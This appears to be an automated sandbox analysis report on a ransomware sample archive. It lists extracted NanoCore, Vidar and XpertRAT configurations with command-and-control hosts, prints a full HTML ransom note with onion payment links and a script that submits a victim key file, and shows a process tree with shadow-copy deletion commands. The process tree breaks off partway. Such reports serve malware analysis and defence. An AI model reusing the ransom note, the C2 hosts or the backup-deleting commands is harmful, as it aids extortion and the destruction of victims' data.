Overview

overview

10

Static

static

1

RNSM00344.7z

windows7-x64

10

Analysis

  • max time kernel
    202s
  • max time network
    206s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    10-11-2024 16:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00344.7z

  • Size

    9.2MB

  • MD5

    2fedb70cf5b5387599c79c2a2785e00d

  • SHA1

    0e4fe1eb453d930ee3950c969ddcf10bdf841187

  • SHA256

    b001eb3fc9a1569375c52ad71f75483b3f7a5d0b9b6d78a6493729cadc05d74b

  • SHA512

    2ec43337122ef0026dcc3a47bc179dbf7bdb4ce2e05d2c55f8bc1bbd77c8195cbe9d41d1d7a7412dcc7e9111cd2719778a16f60302d9ac1e240649f2d577d5cc

  • SSDEEP

    196608:TUI11pp1nVovwjMrLzmiF/oreRWX0ZTbQugpwANCUG+Z:RDpPVovwjMrPFdoreRWX0ZTbQ/CUlZ

Score
10/10
dharmaglobeimposternanocorevidarxpertrat10/18credential_accessdefense_evasiondiscoveryevasionexecutionimpactkeyloggerpersistenceprivilege_escalationransomwareratspywarestealertrojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

hangulcoxpw.pw:4003

securefbi.ddns.net:4003
Mutex

ef9cbd86-f3d1-405e-b5e1-df86325ab516

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    securefbi.ddns.net

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2018-08-05T09:04:02.038587836Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    4003

  • default_group

    Default

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    ef9cbd86-f3d1-405e-b5e1-df86325ab516

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    hangulcoxpw.pw

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

vidar

C2

http://montemon.com/

Extracted

Family

xpertrat

Version

3.1.9

Botnet

10/18

C2

nl-amsterdam.ra4wvpn.com:8585

hikari.sakananoko.io:8585

nozomi.sakananoko.io:8585
Mutex

A6F228P5-F8G1-F1T6-B1X3-I7P6I4R8F6F5

Extracted

Path

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\[HOW_TO_DECRYPT_FILES].html

Ransom Note
<html> <head> <title>How can I recover my files ?</title> <style> html, body { font-family: lucida sans,tahoma,aerial,serif; font-size: 14px; overflow-x: hidden; background-color: #fff; padding-left: 1rem; } div.box { border: 1px dotted #212121; padding: 0.4rem; display: block; margin-top: 0.5rem; margin-bottom: 0.5rem; } input[type=submit] { border: none; padding: 0.1rem 0.7rem 0.1rem 0.7rem; background-color: #303f9f; color: #fff; } input[type=submit]:hover { background-color: #212121; } a { color: #212121; text-decoration: none; font-weight: bold; } a:hover { color: #3f51b5; text-decoration: underline; } </style> </head> <body onload="submit_form()"> <div style="margin: auto; max-width: 750px; padding: .5rem 1.5rem .5rem 1.5rem;"> <h3>What happened to my files ?</h3> <p> All of your important files were encrypted using a combination of <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Public-key_cryptography">RSA-2048</a> and <a rel="noreferrer" href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">AES-256</a>. </p> <h3>What does this mean ?</h3> <p> This means that your files were modified in a way that makes working with them impossible, unless you have the keys to decrypt them. </p> <h3>Is it possible to recover my files ?</h3> <p> Yes, it possible to get your files back, you'll need a special program (decryptor) and the private key of the key pair used to encrypt them. </p> <h3>How can I get the decryptor and the private key ?</h3> <p> First, you'll need to synchronize your machine with our site, you can do this by clicking the button "Upload the KEY file". You can also manually upload the synchronization file <span style="border: 1px dotted #212121;padding: 0.1rem 0.3rem 0.1rem 0.3rem;">C:\Users\Public\Desktop\KEY</span> by visiting any of the links below. <span style="display: block; font-size: 0.8rem;">*This file contains information to identify your machine and the keys used to encrypt your files. However, those keys are encrypted and only our server can decrypt them.</span> </p> <p> After you've synchronized your machine with our server, you'll just need to follow the instructions there on how to pay for the decryption of your files. </p> <div style="text-align: center;padding-top: 0.5rem; padding-bottom: 0.5rem;"> <form id="infection_form" action="http://lockerrwhuaf2jjx.onion.sx" method="POST"> <input type="hidden" name="infection" value="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"> <noscript><span style="color: red; font-weight: bold;">Javascript is disabled! You must click the button below or manually upload the KEY file.</span></noscript> <input type="submit" value="Upload the KEY file"> </form> </div> <div class="box"> <p> Instructions to install Tor Browser (recommended). </p> <hr> <ol> <li>Download the Tor Browser Bundle here: <a rel="noreferrer" href="https://www.torproject.org/download/download-easy.html.en#windows">https://www.torproject.org</a>.</li> <li>Execute the file you downloaded to extract the Tor Browser into a folder on your computer.</li> <li>Then simply open the folder and click on "Start Tor Browser".</li> <li>Copy and paste the onion address into the address bar:<br><br><span style="border: 1px dotted #212121;padding: 0.15rem 0.3rem 0.15rem 0.3rem;">http://lockerrwhuaf2jjx.onion/NNYJZAHP_BA887275D0CD2F5E6522DF69/</span></li> </ol> </div> <div class="box"> <p style="text-align: center; color: red;"> Although it is not recommended to use web proxies to access the website, you can use the links below with a normal browser to access your page. Just remember to use the Tor Browser whenever making a payment. WARNING: The links below do not belong to us, they all go through someone else's server and should be avoided whenever possible. </p> <ol> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275D0CD2F5E6522DF69/">http://lockerrwhuaf2jjx.onion.sx/NNYJZAHP_BA887275D0CD2F5E6522DF69/</a></li> <li><a rel="noreferrer" href="http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275D0CD2F5E6522DF69/">http://lockerrwhuaf2jjx.onion.link/NNYJZAHP_BA887275D0CD2F5E6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275D0CD2F5E6522DF69/">https://lockerrwhuaf2jjx.onion.rip/NNYJZAHP_BA887275D0CD2F5E6522DF69/</a></li> <li><a rel="noreferrer" href="https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275D0CD2F5E6522DF69/">https://lockerrwhuaf2jjx.onion.to/NNYJZAHP_BA887275D0CD2F5E6522DF69/</a></li> </ol> </div> </div> </body> <script> function submit_form() { if (confirm('Do you want the KEY file to be automatically uploaded ?')) { document.infection_form.submit(); } } </script> </html>

Signatures

  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

    ransomwaredharma
  • Dharma family
    dharma
  • GlobeImposter

    GlobeImposter is a ransomware first seen in 2017.

    ransomwareglobeimposter
  • Globeimposter family
    globeimposter
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • Nanocore family
    nanocore
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

    ratxpertrat
  • XpertRAT Core payload 1 IoCs
  • Xpertrat family
    xpertrat
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (292) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (8676) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Vidar Stealer 2 IoCs
    stealer
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 8 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 1 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 10 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 5 IoCs
    evasiontrojan
  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 9 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 3 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs net.exe
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00344.7z"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2404
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:2844
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Users\Admin\Desktop\00344\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2fa71c16ce2bf85c569d2a8de20fafe994bb08a08865c21b49d0d6f2ed6a10e0.exe
      HEUR-Trojan-Ransom.MSIL.Blocker.gen-2fa71c16ce2bf85c569d2a8de20fafe994bb08a08865c21b49d0d6f2ed6a10e0.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Users\Admin\Desktop\00344\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2fa71c16ce2bf85c569d2a8de20fafe994bb08a08865c21b49d0d6f2ed6a10e0.exe
        "C:\Users\Admin\Desktop\00344\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2fa71c16ce2bf85c569d2a8de20fafe994bb08a08865c21b49d0d6f2ed6a10e0.exe"
        3⤵
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        PID:3244
    • C:\Users\Admin\Desktop\00344\HEUR-Trojan-Ransom.Win32.Blocker.gen-2843f5bb3a5c0895d62f40d8d291ec1f537c9a07581c592e723aa74b22e4d4d4.exe
      HEUR-Trojan-Ransom.Win32.Blocker.gen-2843f5bb3a5c0895d62f40d8d291ec1f537c9a07581c592e723aa74b22e4d4d4.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of SetWindowsHookEx
      PID:2212
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        3⤵
        • Maps connected drives based on registry
        • System Location Discovery: System Language Discovery
        PID:1700
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k
          4⤵
            PID:3812
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 192
            4⤵
            • Program crash
            PID:3580
      • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Blocker.ljet-e6f1e62524e0e65cbff009b4b3f10c5799c4244e550b6a84235ac766f730b8e5.exe
        Trojan-Ransom.Win32.Blocker.ljet-e6f1e62524e0e65cbff009b4b3f10c5799c4244e550b6a84235ac766f730b8e5.exe
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of SetWindowsHookEx
        PID:2096
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.vbs"
          3⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:1752
        • C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.exe
          "C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:3772
          • C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.exe
            C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.exe"
            4⤵
            • UAC bypass
            • Windows security bypass
            • Executes dropped EXE
            • Windows security modification
            • Checks whether UAC is enabled
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of UnmapMainImage
            • System policy modification
            PID:2584
            • C:\Program Files (x86)\Internet Explorer\iexplore.exe
              C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.exe
              5⤵
                PID:2368
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                C:\Users\Admin\AppData\Local\Temp\Regedit\Regedils.exe
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: SetClipboardViewer
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:4200
        • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Blocker.lktw-9f7876454ef063bca2c9a91871842171314af89d75dafc07730a52c19144d6d4.exe
          Trojan-Ransom.Win32.Blocker.lktw-9f7876454ef063bca2c9a91871842171314af89d75dafc07730a52c19144d6d4.exe
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Users\Admin\AppData\Roaming\cexplorer.exe
            "C:\Users\Admin\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3824
            • C:\Users\Admin\AppData\Local\Temp\is-J8PST.tmp\cexplorer.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-J8PST.tmp\cexplorer.tmp" /SL5="$1025E,6397385,121344,C:\Users\Admin\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:3828
              • C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                5⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:3268
              • C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                5⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Modifies registry class
                PID:212
              • C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • System Location Discovery: System Language Discovery
                PID:3712
              • C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                5⤵
                • Executes dropped EXE
                PID:4876
          • C:\Users\Admin\AppData\Roaming\update.exe
            "C:\Users\Admin\AppData\Roaming\update.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            PID:3892
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im update.exe /f & erase C:\Users\Admin\AppData\Roaming\update.exe & exit
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2676
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /im update.exe /f
                5⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4044
        • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Crusis.to-9d9a23d41135defde86a0c0e0f7887586db1324efde2cd319987a905e97879fa.exe
          Trojan-Ransom.Win32.Crusis.to-9d9a23d41135defde86a0c0e0f7887586db1324efde2cd319987a905e97879fa.exe
          2⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops desktop.ini file(s)
          • Drops file in System32 directory
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2360
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1784
            • C:\Windows\system32\mode.com
              mode con cp select=1251
              4⤵
                PID:2068
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                4⤵
                • Interacts with shadow copies
                PID:1196
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe"
              3⤵
                PID:3996
                • C:\Windows\system32\mode.com
                  mode con cp select=1251
                  4⤵
                    PID:4960
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:3880
                • C:\Windows\System32\mshta.exe
                  "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  PID:4976
                • C:\Windows\System32\mshta.exe
                  "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
                  3⤵
                  • Modifies Internet Explorer settings
                  PID:3468
              • C:\Users\Admin\Desktop\00344\Trojan-Ransom.Win32.Crypmod.aald-521e8b48c7c4d54ffeaee381118505215b0dd36ada17b5452e1eaacac4e3a70e.exe
                Trojan-Ransom.Win32.Crypmod.aald-521e8b48c7c4d54ffeaee381118505215b0dd36ada17b5452e1eaacac4e3a70e.exe
                2⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops desktop.ini file(s)
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious behavior: RenamesItself
                • Suspicious use of WriteProcessMemory
                PID:1596
                • C:\Windows\splwow64.exe
                  C:\Windows\splwow64.exe 12288
                  3⤵
                    PID:3836
                  • C:\Windows\SysWOW64\cmd.exe
